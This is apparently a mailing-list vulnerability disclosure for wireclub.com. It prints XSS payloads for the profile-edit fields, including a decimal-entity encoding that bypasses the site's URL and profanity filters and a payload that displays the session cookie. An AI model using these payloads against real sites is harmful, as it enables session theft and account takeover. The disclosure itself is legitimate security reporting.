<<< Date Index >>>     <<< Thread Index >>>

Wireclub.com - XSS & cookie disclosure



Wireclub.com

Homepage:
http://www.wireclub.com

Effected files:
input boxes of editing a profile

XSS Vuln with no filter evasion at all:

<IMG SRC=javascript:alert('XSS')>

We notice that when trying to put a url in the Open line about yourself input 
box, we get the msg "no urls allowed" as well as "the field cannot contain 
profanity (since i'm using youfucktard), One way to bypass this msg is change 
the whole url to decimal value. or just parts of it; ie: http:// or the ending 
of it, as well as part of the word "fuck"

PoC:
&#104&#116&#116&#112&#58&#47&#47you&#102ucktard&#46&#99&#111&#109


Screenshots:
http://www.youfucktard.com/xsp/wire1.jpg
http://www.youfucktard.com/xsp/wire2.jpg
http://www.youfucktard.com/xsp/wire3.jpg

XSS Vuln in same edit box, this time writing the cookie on screen:
[img src="javascript:document.write(document.cookie)"]

Screenshots:
http://www.youfucktard.com/xsp/wire4.jpg
http://www.youfucktard.com/xsp/wire5.jpg